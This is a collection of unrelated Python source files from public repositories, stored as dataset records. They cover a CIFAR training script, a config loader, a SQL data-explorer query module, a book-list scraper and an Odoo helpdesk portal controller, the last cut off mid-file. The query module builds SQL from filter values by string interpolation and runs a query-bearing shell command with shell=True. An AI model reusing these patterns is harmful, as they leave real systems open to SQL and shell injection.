indices=range(int(TRAINING_SUBSET * len(train_dataset))))\npartial_len = len(train_dataset)\ntrain_dataset, val_dataset = random_split(train_dataset, [int(0.9 * len(train_dataset)), int(0.1 * len(train_dataset))])\ntrain_len = len(train_dataset)\nprint(f\"orig_len={orig_len}, partial_len={partial_len}, train_len={train_len}\")\n\n# Create separate dataloaders for the train, test, and validation set\ntrain_loader = DataLoader(train_dataset, batch_size=B_SIZE, shuffle=True)\nval_loader = DataLoader(val_dataset, batch_size=B_SIZE, shuffle=True)\ntest_loader = DataLoader(test_dataset, batch_size=B_SIZE, shuffle=True)\n\nimgs, labels = next(iter(train_loader))\nprint(f\"A single batch of images has shape: {imgs.size()}\")\nexample_image, example_label = imgs[0], labels[0]\nc, w, h = example_image.size()\nd = c * w * h\n\nbest_lr = parameter_search(train_loader, val_loader, linear_model, LRS, 20)\neval_linear_model(best_lr)\n\n# model = model.to(DEVICE) # Sending a model to GPU\n\n# for x, y in tqdm(data_loader):\n#     x, y = x.to(DEVICE), y.to(DEVICE) # Sending data to available device","repo_name":"ejh3/LearningMachineLearning","sub_path":"[5]cifar_classifiers/linear_nn.py","file_name":"linear_nn.py","file_ext":"py","file_size_in_byte":7273,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
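The accuracy bookkeeping in the script above divides correct-prediction counts by len(loader.dataset); a small self-contained check (sizes made up) of why that denominator is exact while B_SIZE * len(loader) over-counts whenever the final batch is short:

    import torch
    from torch.utils.data import DataLoader, TensorDataset

    ds = TensorDataset(torch.zeros(1000, 3), torch.zeros(1000, dtype=torch.long))
    loader = DataLoader(ds, batch_size=128)
    print(len(loader.dataset))  # 1000: the exact number of examples
    print(128 * len(loader))    # 1024: treats the short last batch as a full one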
+{"seq_id":"69793828561","text":"#coding: utf8\nfrom __future__ import absolute_import\nimport os\nimport json\nfrom farbox_bucket.utils.path import read_file, make_sure_path, write_file\n\n\ndef _get_env(key):\n lower_key = key.lower()\n upper_key = key.upper()\n v = os.environ.get(key) or os.environ.get(lower_key) or os.environ.get(upper_key)\n if v:\n return v\n filenames = [key, '%s.json'%key, '%s.txt'%key]\n if lower_key not in filenames:\n filenames += [lower_key, '%s.txt'%lower_key]\n for filename in filenames:\n filepath1 = os.path.join('/tmp/env', filename)\n filepath2 = os.path.join('/env', filename)\n filepath3 = os.path.join('/mt/web/configs', filename)\n filepaths = [filepath1, filepath2, filepath3]\n path_in_env = os.environ.get(key + '_filepath')\n if path_in_env:\n filepaths.append(path_in_env)\n for filepath in filepaths:\n if os.path.isfile(filepath) and os.path.getsize(filepath) < 10*1024:\n try:\n with open(filepath, 'rb') as f:\n raw_content = f.read()\n except:\n continue\n v = raw_content.strip()\n if v:\n # cache it\n os.environ[key] = v\n return v\n\n\napp_global_envs_may_be_paths = [\"/mt/web/data/configs.json\",\n \"/mt/web/configs/configs.json\",\n \"/tmp/farbox_bucket_configs.json\"]\n\n\napp_global_config_folder = \"/mt/web/configs\"\napp_nginx_server_ssl_cert_filepath = \"/mt/web/configs/nginx/server.crt\"\napp_nginx_server_ssl_key_filepath = \"/mt/web/configs/nginx/server.key\"\n\n\n\ndef store_nginx_server_cert(ssl_key, ssl_cert):\n if not ssl_key or not ssl_cert:\n return\n old_ssl_key = read_file(app_nginx_server_ssl_key_filepath)\n old_ssl_cert = read_file(app_nginx_server_ssl_cert_filepath)\n if old_ssl_key != ssl_key or old_ssl_cert != ssl_cert:\n make_sure_path(app_nginx_server_ssl_cert_filepath, is_file=True)\n write_file(app_nginx_server_ssl_key_filepath, ssl_key)\n write_file(app_nginx_server_ssl_cert_filepath, ssl_cert)\n # reload nginx\n c_f = os.popen(\"/usr/nginx/sbin/nginx -s reload\")\n try: c_f.read()\n except: pass\n\n\n\ndef set_app_global_envs(envs_configs):\n # /mt/web/data 的优先,这样 container 的变化, /mt/web/configs 的变化也不会影响到\n if not isinstance(envs_configs, dict):\n return\n try:\n content_to_write = json.dumps(envs_configs)\n for path in app_global_envs_may_be_paths:\n try:\n with open(path, \"wb\") as f:\n f.write(content_to_write)\n # 保存主域名的 SSL 证书,主要是提供给二级域名的 wilde ssl\n store_nginx_server_cert(envs_configs.get(\"domain_ssl_key\"), envs_configs.get(\"domain_ssl_cert\"))\n return\n except:\n pass\n except:\n return\n\n\ndef load_app_global_envs():\n for path in app_global_envs_may_be_paths:\n if os.path.isfile(path):\n try:\n with open(path, \"rb\") as f:\n raw_content = f.read()\n data = json.loads(raw_content)\n if isinstance(data, dict):\n return data\n except:\n pass\n return {} # by default\n\n\nglobal_envs = None\ndef get_global_envs():\n global global_envs\n if global_envs is None:\n global_envs = load_app_global_envs()\n return global_envs\n\n\n\ndef get_env(key):\n envs = get_global_envs()\n lower_key = key.lower()\n if lower_key in envs:\n matched_value = envs.get(lower_key)\n if matched_value is not None and matched_value != \"\":\n return matched_value\n return _get_env(key)\n\n","repo_name":"hepochen/FarBox","sub_path":"farbox_bucket/utils/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":3862,"program_lang":"python","lang":"en","doc_type":"code","stars":155,"dataset":"github-code","pt":"3"}
+{"seq_id":"3951992712","text":"\"\"\"Queries on data sets\"\"\"\n\nimport datetime\nimport json\nimport re\nimport subprocess\nimport math\nimport decimal\n\nimport sqlalchemy\nfrom .data_set import find_data_set\nfrom sqlalchemy.ext.declarative import declarative_base\n\nimport mara_db.dbs\nimport mara_db.shell\nimport mara_db.postgresql\nfrom mara_page import acl\n\nBase = declarative_base()\n\n\nclass Filter():\n def __init__(self, column_name, operator, value):\n \"\"\"\n A \"where condition\" for a data set query\n Args:\n column_name: The column to filter on\n operator: The comparision operator (depends on column type\n value: The constant value to compare the column to\n \"\"\"\n self.column_name = column_name\n self.operator = operator\n self.value = value\n\n def to_dict(self):\n return {'column_name': self.column_name, 'operator': self.operator, 'value': self.value}\n\n @classmethod\n def from_dict(cls, d):\n return Filter(**d)\n\n\nclass Query(Base):\n __tablename__ = 'data_set_query'\n\n query_id = sqlalchemy.Column(sqlalchemy.String, primary_key=True)\n data_set_id = sqlalchemy.Column(sqlalchemy.String, primary_key=True)\n\n column_names = sqlalchemy.Column(sqlalchemy.ARRAY(sqlalchemy.TEXT))\n sort_column_name = sqlalchemy.Column(sqlalchemy.TEXT)\n sort_order = sqlalchemy.Column(sqlalchemy.TEXT)\n filters = sqlalchemy.Column(sqlalchemy.JSON)\n\n created_at = sqlalchemy.Column(sqlalchemy.TIMESTAMP(timezone=True), nullable=False)\n created_by = sqlalchemy.Column(sqlalchemy.TEXT, nullable=False)\n updated_at = sqlalchemy.Column(sqlalchemy.TIMESTAMP(timezone=True), nullable=False)\n updated_by = sqlalchemy.Column(sqlalchemy.TEXT, nullable=False)\n\n def __init__(self, data_set_id: str, query_id: str = None, column_names: [str] = None,\n sort_column_name: str = None, sort_order: str = 'ASC',\n filters: [Filter] = None,\n created_at: datetime.datetime = None, created_by: str = None,\n updated_at: datetime.datetime = None, updated_by: str = None):\n \"\"\"\n Represents a query on a data set\n\n Args:\n data_set_id: The id of the data set to query\n query_id: The id (name) of the query\n column_names: All columns that are included in the query\n sort_column_name: The column to sort on\n sort_order: How to sort, 'ASC', 'DESC' or None\n filters: Restrictions on the data set\n\n created_at: When the query was created\n created_by: Rhe user that created the query\n\n updated_at: When the query was changed the last time\n updated_by: The user that changed the query last\n \"\"\"\n self.data_set = find_data_set(data_set_id)\n\n self.data_set_id = data_set_id\n self.query_id = re.sub(r'\\W+', '-', query_id).lower() if query_id else ''\n self.column_names = [column_name for column_name in\n (self.data_set.default_column_names if column_names == None else column_names)\n if column_name in self.data_set.columns]\n self.sort_column_name = sort_column_name if sort_column_name in self.data_set.columns else None\n self.sort_order = sort_order\n self.filters = [filter for filter in filters or [] if filter.column_name in self.data_set.columns]\n self.created_at = created_at\n self.created_by = created_by\n self.updated_at = updated_at\n self.updated_by = updated_by\n\n def run(self, limit=None, offset=None, include_personal_data: bool = True):\n \"\"\"\n Runs the query and returns the result\n Args:\n limit: How many rows to return at max\n offset: Which row to start with\n include_personal_data: When True, include columns that contain personal data\n\n Returns: An array of values\n \"\"\"\n if not 
self.column_names: # table probably does not exists or no columns are selected\n return []\n with mara_db.postgresql.postgres_cursor_context(self.data_set.database_alias) as cursor:\n cursor.execute(self.to_sql(limit=limit, offset=offset, include_personal_data=include_personal_data))\n return cursor.fetchall()\n\n def to_sql(self, limit=None, offset=None, decimal_mark: str = '.', include_personal_data: bool = True):\n if self.column_names:\n columns = []\n for column_name in self.column_names:\n if (not include_personal_data) and (column_name in self.data_set.personal_data_column_names):\n columns.append(f\"\"\"'🔒' AS \"{column_name}\" \"\"\")\n elif self.data_set.columns[column_name].type == 'number' and decimal_mark == ',':\n columns.append(f'''REPLACE(\"{column_name}\"::TEXT, '.', ',') AS \"{column_name}\"''')\n else:\n columns.append(f'\"{column_name}\"')\n\n sql = f\"\"\"\nSELECT \"\"\" + ',\\n '.join(columns) + f\"\"\"\nFROM \"{self.data_set.database_schema}\".\"{self.data_set.database_table}\"\n\"\"\" + self.filters_to_sql()\n if self.sort_order and self.sort_column_name:\n sql += f'\\nORDER BY \"{self.sort_column_name}\" {self.sort_order} NULLS LAST\\n';\n\n if limit is not None:\n sql += f'\\nLIMIT {int(limit)}\\n'\n if offset is not None:\n sql += f'\\nOFFSET {int(offset)}\\n'\n\n return sql\n else:\n return None\n\n def filters_to_sql(self) -> str:\n \"\"\"Renders a SQL WHERE condition for the query\"\"\"\n if self.filters:\n return 'WHERE ' + '\\n AND '.join([self.filter_to_sql(filter) for filter in self.filters]) + '\\n'\n else:\n return ''\n\n def filter_to_sql(self, filter: Filter):\n \"\"\"Renders a filter to a part of an SQL WHERE expression\"\"\"\n type = self.data_set.columns[filter.column_name].type\n if type == 'text':\n if filter.operator == '~':\n return f'\"{filter.column_name}\" ILIKE ANY(ARRAY[' \\\n + ', '.join(f\"'%{value}%'\" for value in filter.value or ['']) + ']::TEXT[])'\n else:\n return f'''\"{filter.column_name}\" {'IN' if filter.operator == '=' else 'NOT IN'} (''' \\\n + ', '.join(f\"'{value}'\" for value in filter.value or ['']) + ')'\n elif type == 'text[]':\n clause = f'''\"{filter.column_name}\" && ARRAY[''' \\\n + ', '.join(f\"'{value}'\" for value in filter.value or ['']) + ']::TEXT[]'\n if filter.operator == '!=':\n clause = ' not (' + clause + ')'\n return clause\n elif type == 'number':\n return f'''\"{filter.column_name}\" {filter.operator} {filter.value}'''\n elif type == 'date':\n return f'''\"{filter.column_name}\"::Date {filter.operator} '{filter.value}' '''\n else:\n return '1=1'\n\n def row_count(self):\n \"\"\"Compute how many rows will be returned by the current set of filters\"\"\"\n with mara_db.postgresql.postgres_cursor_context(self.data_set.database_alias) as cursor:\n cursor.execute(f'SELECT count(*) FROM \"{self.data_set.database_schema}\".\"{self.data_set.database_table}\" '\n + self.filters_to_sql())\n return cursor.fetchone()[0]\n\n def filter_row_count(self, filter_pos):\n with mara_db.postgresql.postgres_cursor_context(self.data_set.database_alias) as cursor:\n cursor.execute(\n f'SELECT count(*) FROM \"{self.data_set.database_schema}\".\"{self.data_set.database_table}\" WHERE '\n + self.filter_to_sql(self.filters[filter_pos]))\n return cursor.fetchone()[0]\n\n def as_csv(self, delimiter, decimal_mark, include_personal_data):\n query = self.to_sql(decimal_mark=decimal_mark, include_personal_data=include_personal_data).replace('\"', '\\\\\"')\n command = mara_db.shell.query_command(self.data_set.database_alias, 
echo_queries=False) \\\n + f''' --command=\"COPY ({query}) TO STDOUT WITH DELIMITER E'{delimiter}' CSV HEADER;\"'''\n\n return subprocess.check_output(command, shell=True)\n\n def as_rows_for_google_sheet(self, array_format, header: bool = True, limit=None,\n include_personal_data: bool = True):\n \"\"\"\n Runs the query and returns the result as Google sheet's data input (list of lists)\n Args:\n header: When True, include a header row with the column names\n limit: How many rows to return at max\n offset: Which row to start with\n include_personal_data: When True, include columns that contain personal data\n array_format: Array to string format for array types\n\n Returns: Google sheet's data input as list of lists\n \"\"\"\n if not self.column_names: # table probably does not exists or no columns are selected\n return []\n with mara_db.postgresql.postgres_cursor_context(self.data_set.database_alias) as cursor:\n cursor.execute(self.to_sql(limit=limit, include_personal_data=include_personal_data))\n result = cursor.fetchall()\n if header is True:\n column_names = [desc[0] for desc in cursor.description]\n yield column_names\n for row in result:\n row_list = []\n for value in list(row):\n if isinstance(value, str):\n list_value_str = value.replace('\\t', ' - ')\n # no more than 50k characters for a single cell value (Google API limit reference)\n row_list.append((list_value_str[:48995] + ' ... ') if len(list_value_str) > 50000 else value)\n elif isinstance(value, list):\n list_value_str = str(value).replace('\\t', ' - ') if len(value) > 0 else ''\n # Adjust array format\n if array_format == 'curly':\n list_value_str = ('{' + list_value_str[1:-1] + '}').replace('{}', '')\n elif array_format == 'tuple':\n list_value_str = str(tuple(value)).replace('\\t', ' - ') if len(value) > 0 else ''\n\n row_list.append(\n (list_value_str[:48995] + ' ... 
') if len(list_value_str) > 50000 else list_value_str)\n                    elif isinstance(value, datetime.datetime):\n                        row_list.append(str(value.strftime(\"%d-%m-%Y\")))\n                    else:\n                        row_list.append(value)\n                yield row_list\n\n    def number_distribution(self, column_name):\n        \"\"\"Returns a frequency histogram for a number column\"\"\"\n        with mara_db.postgresql.postgres_cursor_context(self.data_set.database_alias) as cursor:\n            cursor.execute(f\"\"\"\nSELECT min(\"{column_name}\") :: NUMERIC AS min_value,\n       max(\"{column_name}\") :: NUMERIC AS max_value,\n       count(*) AS number_of_values\nFROM \"{self.data_set.database_schema}\".\"{self.data_set.database_table}\"\nWHERE \"{column_name}\" IS NOT NULL\n      {('AND ' + ' AND '.join([self.filter_to_sql(filter) for filter in self.filters])) if self.filters else ''}\n\"\"\")\n            (min_value, max_value, number_of_values) = cursor.fetchone()\n            if min_value is None:\n                return []\n\n            min_buckets = 5\n\n            # find the highest magnitude of 10\n            exponent = math.ceil(max(abs(min_value).log10(), abs(max_value).log10()))\n\n            # when there is only a single value\n            if min_value == max_value:\n                return [(float(min_value), float(max_value), float(number_of_values))]\n\n            while True:\n                _10 = decimal.Decimal(10)\n\n                # truncate to the next lower magnitude of 10\n                min_ = math.floor(min_value / pow(_10, exponent))\n                max_ = math.ceil(max_value / pow(_10, exponent))\n\n                if (max_ - min_) > min_buckets:\n                    # compute buckets (tuples of min and max values)\n                    cursor.execute(f\"\"\"\nSELECT width_bucket(\"{column_name}\", {min_ * pow(_10, exponent)}, {max_ * pow(_10, exponent)}, {max_ - min_}) as bucket,\n       count(*) AS n\nFROM \"{self.data_set.database_schema}\".\"{self.data_set.database_table}\"\nWHERE \"{column_name}\" IS NOT NULL\n      {('AND ' + ' AND '.join([self.filter_to_sql(filter) for filter in self.filters])) if self.filters else ''}\nGROUP by bucket\nORDER BY bucket\n\"\"\")\n                    return [(float((min_ + bucket - 1) * pow(_10, exponent)),\n                             float((min_ + bucket) * pow(_10, exponent)),\n                             n) for bucket, n in cursor.fetchall()]\n                else:\n                    exponent -= 1\n\n    def date_distribution(self, column_name):\n        \"\"\"Returns a frequency histogram for a date column\"\"\"\n\n        import arrow\n\n        with mara_db.postgresql.postgres_cursor_context(self.data_set.database_alias) as cursor:\n                cursor.execute(f\"\"\"\nSELECT min(\"{column_name}\") :: TIMESTAMPTZ AS min_value,\n       max(\"{column_name}\") :: TIMESTAMPTZ AS max_value\nFROM \"{self.data_set.database_schema}\".\"{self.data_set.database_table}\"\nWHERE \"{column_name}\" IS NOT NULL\n      {('AND ' + ' AND '.join([self.filter_to_sql(filter) for filter in self.filters])) if self.filters else ''}\n\"\"\")\n                (min_value, max_value) = cursor.fetchone()\n                if min_value is None:\n                    return []\n\n                resolutions = {'year': 'YYYY',\n                               'month': 'YYYY Mon',\n                               'week': 'IYYY \"-\" \"CW \"IW',\n                               'day': 'Dy, Mon DD YYYY'}\n\n                min_buckets = 5\n\n                for resolution in resolutions.keys():\n                    if len(list(arrow.Arrow.range(resolution, min_value, max_value))) >= min_buckets:\n                        break\n\n                # compute buckets (tuples of min and max values)\n                cursor.execute(f\"\"\"\nSELECT date_trunc('{resolution}', \"{column_name}\") as d,\n       to_char(date_trunc('{resolution}', \"{column_name}\"), '{resolutions[resolution]}'),\n       count(*) AS n\nFROM \"{self.data_set.database_schema}\".\"{self.data_set.database_table}\"\nWHERE \"{column_name}\" IS NOT NULL\n      {('AND ' + ' AND '.join([self.filter_to_sql(filter) for filter in self.filters])) if 
self.filters else ''}\nGROUP by d\nORDER BY d\n\"\"\")\n return cursor.fetchall()\n\n def text_distribution(self, column_name):\n \"\"\"Returns the most frequent values and their counts for a column\"\"\"\n with mara_db.postgresql.postgres_cursor_context(self.data_set.database_alias) as cursor:\n cursor.execute(f'''\nSELECT \"{column_name}\" AS value,\n count(*) AS n\nFROM \"{self.data_set.database_schema}\".\"{self.data_set.database_table}\"\nWHERE \"{column_name}\" IS NOT NULL \n {('AND ' + ' AND '.join([self.filter_to_sql(filter) for filter in self.filters])) if self.filters else ''}\nGROUP BY value\nORDER BY n DESC\nLIMIT 10''')\n return cursor.fetchall()\n\n def text_array_distribution(self, column_name):\n \"\"\"Returns the most frequent values and their counts for a text array column\"\"\"\n with mara_db.postgresql.postgres_cursor_context(self.data_set.database_alias) as cursor:\n cursor.execute(f'''\nSELECT unnest(\"{column_name}\") AS value,\n count(*) AS n\nFROM \"{self.data_set.database_schema}\".\"{self.data_set.database_table}\"\nWHERE \"{column_name}\" IS NOT NULL \n {('AND ' + ' AND '.join([self.filter_to_sql(filter) for filter in self.filters])) if self.filters else ''}\nGROUP BY value\nORDER BY n DESC\nLIMIT 10''')\n return cursor.fetchall()\n\n def save(self):\n \"\"\"Saves a query in the database\"\"\"\n with mara_db.postgresql.postgres_cursor_context('mara') as cursor:\n cursor.execute(f'''\nINSERT INTO data_set_query (query_id, data_set_id, column_names, sort_column_name, sort_order, filters, \n created_at, created_by, updated_at, updated_by)\nVALUES ({'%s, %s, %s, %s, %s, %s, %s, %s, %s, %s'})\nON CONFLICT (query_id, data_set_id)\nDO UPDATE SET \n column_names=EXCLUDED.column_names,\n sort_column_name=EXCLUDED.sort_column_name,\n sort_order=EXCLUDED.sort_order,\n filters=EXCLUDED.filters,\n updated_at=EXCLUDED.updated_at, \n updated_by=EXCLUDED.updated_by\n''', (self.query_id, self.data_set.id, self.column_names, self.sort_column_name, self.sort_order,\n json.dumps([filter.to_dict() for filter in self.filters]),\n datetime.datetime.now(), acl.current_user_email(),\n datetime.datetime.now(), acl.current_user_email()))\n\n @classmethod\n def load(cls, query_id, data_set_id):\n \"\"\"Loads a query from the database\"\"\"\n with mara_db.postgresql.postgres_cursor_context('mara') as cursor:\n cursor.execute(f'''\nSELECT data_set_id, query_id, column_names, sort_column_name, sort_order, filters, \n created_at, created_by, updated_at, updated_by \nFROM data_set_query \nWHERE data_set_id = {'%s'} AND query_id = {'%s'}''',\n (data_set_id, query_id))\n (data_set_id, query_id, column_names, sort_column_name, sort_order, filters,\n created_at, created_by, updated_at, updated_by) = cursor.fetchone()\n return Query(data_set_id, query_id, column_names, sort_column_name, sort_order,\n [Filter.from_dict(f) for f in filters],\n created_at, created_by, updated_at, updated_by)\n\n def to_dict(self):\n return {'data_set_id': self.data_set.id,\n 'query_id': self.query_id,\n 'column_names': self.column_names,\n 'sort_column_name': self.sort_column_name,\n 'sort_order': self.sort_order,\n 'filters': [filter.to_dict() for filter in self.filters],\n 'created_at': self.created_at.strftime('%Y-%m-%d') if self.created_at else None,\n 'created_by': self.created_by,\n 'updated_at': self.updated_at.strftime('%Y-%m-%d') if self.updated_at else None,\n 'updated_by': self.updated_by}\n\n @classmethod\n def from_dict(cls, d):\n d = dict(d)\n d['filters'] = [Filter.from_dict(f) for f in d['filters']]\n 
return Query(**d)\n\n    def __repr__(self):\n        return f'<Query \"{self.query_id}\" on data set \"{self.data_set_id}\">'\n\n\ndef delete_query(data_set_id, query_id: str):\n    with mara_db.postgresql.postgres_cursor_context('mara') as cursor:\n        cursor.execute(f'''\nDELETE FROM data_set_query\nWHERE data_set_id = {'%s'} AND query_id = {'%s'}''', (data_set_id, query_id))\n\n\ndef list_queries(data_set_id: str):\n    with mara_db.postgresql.postgres_cursor_context('mara') as cursor:\n        cursor.execute(f'''\nSELECT query_id, updated_at, updated_by\nFROM data_set_query\nWHERE data_set_id = {'%s'}\nORDER BY updated_at DESC\n''', (data_set_id,))\n        return cursor.fetchall()\n","repo_name":"mara/mara-data-explorer","sub_path":"mara_data_explorer/query.py","file_name":"query.py","file_ext":"py","file_size_in_byte":19286,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"3"}
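Filter.to_dict/from_dict plus Query.to_sql make a whole query serializable and renderable without touching the warehouse; a sketch of building one in memory, assuming a data set with id 'orders' and a text column 'status' has been registered (both names invented):

    from mara_data_explorer.query import Query, Filter

    q = Query('orders', column_names=['status'],
              filters=[Filter('status', '=', ['shipped', 'returned'])])
    print(q.to_sql(limit=10))
    # roughly:
    # SELECT "status"
    # FROM "<schema>"."<table>"
    # WHERE "status" IN ('shipped', 'returned')
    # LIMIT 10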
+{"seq_id":"20560964626","text":"import requests\nimport time\nfrom pyquery import PyQuery as pq\nimport json\n\ndef get_item(url):\n headers={\n \"User-Agent\":\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.\",\n \"Host\":\"book.douban.com\",\n \"Referer\":\"https://book.douban.com/annual/2017?source=navigation\"\n }\n response=requests.get(url=url,headers=headers)\n return response.json()\n\n\ndef parse_item(content):\n items=content.get('res').get('subjects')\n listd=[]\n if items:\n for item in items:\n\n bdict={}\n bdict['type']=content.get('res').get('payload').get('title')\n bdict['title']=item.get('title')\n bdict['rating']=item.get('rating')\n bdict['cover']=content.get('res').get('subject').get('cover')\n listd.append(bdict)\n else: return 'no books'\n return listd\n\ndef write_tofile(books):\n with open('2017书籍榜单.txt','a',encoding='utf-8') as f:\n f.write(json.dumps(books,ensure_ascii=False)+'\\n')\n\n\n\n\n\ndef main(nums):\n url='https://book.douban.com/ithil_j/activity/book_annual2017/widget/'+str(nums)\n html=get_item(url)\n books=parse_item(html)\n write_tofile(books)\n# print(books)\n\n\n\n\n\n\n \nif __name__=='__main__':\n for i in range(40):\n main(i)\n","repo_name":"jackiesune/db-annual-2017","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"12914123056","text":"# -*- coding: utf-8 -*-\n\nfrom odoo.http import request\nfrom operator import itemgetter\nfrom markupsafe import Markup\nfrom odoo import fields, http, SUPERUSER_ID, _\nfrom collections import OrderedDict\nfrom odoo.addons.portal.controllers.portal import CustomerPortal, pager as portal_pager\n# from odoo.addons.portal.controllers import portal\nfrom odoo.tools import groupby as groupbyelem\nfrom odoo.osv.expression import OR, AND\n\n\nclass CustomerPortalInheritInvoice(CustomerPortal):\n \"\"\"Inherit to overwrite the access right of sale/quotation on portal\"\"\"\n\n def _prepare_portal_layout_values(self):\n \"\"\"To enable or disable the access on portal\"\"\"\n values = super(CustomerPortalInheritInvoice, self)._prepare_portal_layout_values()\n values['ticket_enable'] = False\n user_id = request.env['res.users'].browse(request.uid)\n partner_id = request.env['res.partner'].search([('user_ids', '=', user_id.id)], limit=1)\n if partner_id and partner_id.enable_helpdesk_portal_access:\n values['ticket_enable'] = True\n\n return values\n\n def custom_helpdesk_domain(self):\n partner = request.env.user.partner_id\n domain = []\n if partner.enable_helpdesk_portal_access and not partner.access_all_helpdesk_records:\n\n domain.append(('partner_id', '=', partner.id))\n if partner.access_follower_helpdesk_records and not partner.access_all_helpdesk_records:\n domain.insert(0,'|')\n domain.append(('message_follower_ids.partner_id', '=', partner.id))\n if partner.access_all_helpdesk_records and partner.access_follower_helpdesk_records:\n\n domain.append(('message_follower_ids.partner_id', '=', partner.id))\n if partner.child_ids:\n domain.insert(0, '|')\n domain.append(('partner_id', 'in', partner.child_ids.ids))\n if partner.parent_id:\n domain.insert(0, '|')\n domain.insert(0, '|')\n domain.append(('partner_id', 'child_of', partner.parent_id.id))\n domain.append(('partner_id', '=', partner.parent_id.id))\n\n if partner.access_all_helpdesk_records and not partner.access_follower_helpdesk_records:\n\n domain.append(('partner_id', '=', partner.id))\n if partner.child_ids:\n domain.insert(0, '|')\n domain.append(('partner_id', 'in', partner.child_ids.ids))\n if partner.parent_id:\n domain.insert(0, '|')\n domain.insert(0, '|')\n domain.append(('partner_id', 'child_of', partner.parent_id.id))\n domain.append(('partner_id', '=', partner.parent_id.id))\n\n return domain\n\n def _prepare_home_portal_values(self, counters):\n values = super()._prepare_home_portal_values(counters)\n partner = request.env.user.partner_id\n if 'ticket_count' in counters:\n domain = self._prepare_helpdesk_tickets_domain()\n domain += self.custom_helpdesk_domain()\n\n values['ticket_count'] = (\n request.env['helpdesk.ticket'].sudo().search_count(domain)\n if request.env['helpdesk.ticket'].check_access_rights('read', raise_exception=False)\n else 0\n )\n return values\n\n @http.route(['/my/tickets', '/my/tickets/page/'], type='http', auth=\"user\", website=True)\n def my_helpdesk_tickets(self, page=1, date_begin=None, date_end=None, sortby=None, filterby='all', search=None,\n groupby='none', search_in='content', **kw):\n values = self._prepare_portal_layout_values()\n domain = self._prepare_helpdesk_tickets_domain()\n\n searchbar_sortings = {\n 'date': {'label': _('Newest'), 'order': 'create_date desc'},\n 'name': {'label': _('Subject'), 'order': 'name'},\n 'stage': {'label': _('Stage'), 'order': 'stage_id'},\n 'reference': {'label': _('Reference'), 'order': 'id'},\n 'update': {'label': 
_('Last Stage Update'), 'order': 'date_last_stage_update desc'},\n }\n searchbar_filters = {\n 'all': {'label': _('All'), 'domain': []},\n 'assigned': {'label': _('Assigned'), 'domain': [('user_id', '!=', False)]},\n 'unassigned': {'label': _('Unassigned'), 'domain': [('user_id', '=', False)]},\n 'open': {'label': _('Open'), 'domain': [('close_date', '=', False)]},\n 'closed': {'label': _('Closed'), 'domain': [('close_date', '!=', False)]},\n 'last_message_sup': {'label': _('Last message is from support')},\n 'last_message_cust': {'label': _('Last message is from customer')},\n }\n searchbar_inputs = {\n 'content': {'input': 'content', 'label': Markup(_('Search (in Content)'))},\n 'message': {'input': 'message', 'label': _('Search in Messages')},\n 'customer': {'input': 'customer', 'label': _('Search in Customer')},\n 'id': {'input': 'id', 'label': _('Search in Reference')},\n 'status': {'input': 'status', 'label': _('Search in Stage')},\n 'all': {'input': 'all', 'label': _('Search in All')},\n }\n searchbar_groupby = {\n 'none': {'input': 'none', 'label': _('None')},\n 'stage': {'input': 'stage_id', 'label': _('Stage')},\n }\n\n # default sort by value\n if not sortby:\n sortby = 'date'\n order = searchbar_sortings[sortby]['order']\n\n if filterby in ['last_message_sup', 'last_message_cust']:\n discussion_subtype_id = request.env.ref('mail.mt_comment').id\n messages = request.env['mail.message'].search_read(\n [('model', '=', 'helpdesk.ticket'), ('subtype_id', '=', discussion_subtype_id)],\n fields=['res_id', 'author_id'], order='date desc')\n last_author_dict = {}\n for message in messages:\n if message['res_id'] not in last_author_dict:\n last_author_dict[message['res_id']] = message['author_id'][0]\n\n ticket_author_list = request.env['helpdesk.ticket'].search_read(fields=['id', 'partner_id'])\n ticket_author_dict = dict(\n [(ticket_author['id'], ticket_author['partner_id'][0] if ticket_author['partner_id'] else False) for\n ticket_author in ticket_author_list])\n\n last_message_cust = []\n last_message_sup = []\n for ticket_id in last_author_dict.keys():\n if last_author_dict[ticket_id] == ticket_author_dict[ticket_id]:\n last_message_cust.append(ticket_id)\n else:\n last_message_sup.append(ticket_id)\n\n if filterby == 'last_message_cust':\n domain = AND([domain, [('id', 'in', last_message_cust)]])\n else:\n domain = AND([domain, [('id', 'in', last_message_sup)]])\n\n else:\n domain = AND([domain, searchbar_filters[filterby]['domain']])\n\n if date_begin and date_end:\n domain = AND([domain, [('create_date', '>', date_begin), ('create_date', '<=', date_end)]])\n\n # search\n if search and search_in:\n search_domain = []\n if search_in in ('id', 'all'):\n search_domain = OR([search_domain, [('id', 'ilike', search)]])\n if search_in in ('content', 'all'):\n search_domain = OR([search_domain, ['|', ('name', 'ilike', search), ('description', 'ilike', search)]])\n if search_in in ('customer', 'all'):\n search_domain = OR([search_domain, [('partner_id', 'ilike', search)]])\n if search_in in ('message', 'all'):\n discussion_subtype_id = request.env.ref('mail.mt_comment').id\n search_domain = OR([search_domain, [('message_ids.body', 'ilike', search),\n ('message_ids.subtype_id', '=', discussion_subtype_id)]])\n if search_in in ('status', 'all'):\n search_domain = OR([search_domain, [('stage_id', 'ilike', search)]])\n domain = AND([domain, search_domain])\n\n # pager\n partner = request.env.user.partner_id\n domain += self.custom_helpdesk_domain()\n\n tickets_count = 
request.env['helpdesk.ticket'].sudo().search_count(domain)\n pager = portal_pager(\n url=\"/my/tickets\",\n url_args={'date_begin': date_begin, 'date_end': date_end, 'sortby': sortby, 'search_in': search_in,\n 'search': search, 'groupby': groupby, 'filterby': filterby},\n total=tickets_count,\n page=page,\n step=self._items_per_page\n )\n\n tickets = request.env['helpdesk.ticket'].sudo().search(domain, order=order, limit=self._items_per_page,offset=pager['offset'])\n request.session['my_tickets_history'] = tickets.ids[:100]\n\n if groupby == 'stage':\n grouped_tickets = [request.env['helpdesk.ticket'].concat(*g) for k, g in\n groupbyelem(tickets, itemgetter('stage_id'))]\n else:\n grouped_tickets = [tickets]\n\n values.update({\n 'date': date_begin,\n 'grouped_tickets': grouped_tickets,\n 'page_name': 'ticket',\n 'default_url': '/my/tickets',\n 'pager': pager,\n 'searchbar_sortings': searchbar_sortings,\n 'searchbar_filters': searchbar_filters,\n 'searchbar_inputs': searchbar_inputs,\n 'searchbar_groupby': searchbar_groupby,\n 